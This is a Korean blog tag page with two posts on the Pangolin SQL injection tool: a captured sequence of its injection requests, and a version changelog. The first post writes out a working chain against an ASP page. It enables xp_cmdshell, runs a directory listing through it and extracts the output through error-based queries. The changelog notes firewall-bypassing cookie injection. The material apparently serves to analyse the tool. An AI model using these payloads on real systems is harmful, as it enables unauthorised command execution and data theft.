'pangolin'에 해당되는 글 2건

  1. 2009.07.23 Pangolin - XP(확장 프로시져) 활성화 명령어 분석
  2. 2009.04.16 pangolin 버전 업


exec sp_configure 'Ad Hoc Distributed Queries',1;
exec sp_configure 'show advanced options',1;
exec sp_configure xp_cmdshell,1;



/board_view.asp?num=50 ;create table [pangolin_test_table]([resulttxt] nvarchar(4000) null);--

/board_view.asp?num=50 ;declare @z nvarchar(4000) set @z=0xdir c:\ insert into [pangolin_test_table](resulttxt) exec master.dbo.xp_cmdshell @z;alter table

[pangolin_test_table] add id int not null identity (1,1)--

/board_view.asp?num=50 and (select cast(count(1) as varchar(8000))+char(94) from [web]..[pangolin_test_table])>0--

/board_view.asp?num=50 and (select top 1 case when resulttxt is null then char(124) else resulttxt+char(124) end  from [pangolin_test_table] order by [id])


/board_view.asp?num=50 and (select top 1 case when resulttxt is null then char(124) else resulttxt+char(124) end  from [pangolin_test_table] where id not in

(select top 2 id from [pangolin_test_table] order by [id]) )>0--

/board_view.asp?num=50 and (select top 1 case when resulttxt is null then char(124) else resulttxt+char(124) end  from [pangolin_test_table] where id not in

(select top 3 id from [pangolin_test_table] order by [id]) )>0--

/board_view.asp?num=50 and (select top 1 case when resulttxt is null then char(124) else resulttxt+char(124) end  from [pangolin_test_table] where id not in

(select top 4 id from [pangolin_test_table] order by [id]) )>0--

/board_view.asp?num=50 and (select top 1 case when resulttxt is null then char(124) else resulttxt+char(124) end  from [pangolin_test_table] where id not in

(select top 5 id from [pangolin_test_table] order by [id]) )>0--

Posted by 김주일


1.Support for UNICODE

2.Support for SQL Server 2005

3.Support for COOKIE Injection (bypass firewall)

4.Multi-language supported, build in 3 languages: English, Chinese Simplified and Chinese Traditional 

5.Multi-theme supported

6.Fix MSSQL2005 data dump BUG

7.Fix Multi-core CPU error BUG

8.Fix upgrade bug

출 처 : http://www.nosec.org/en/pangolin.html

Posted by 김주일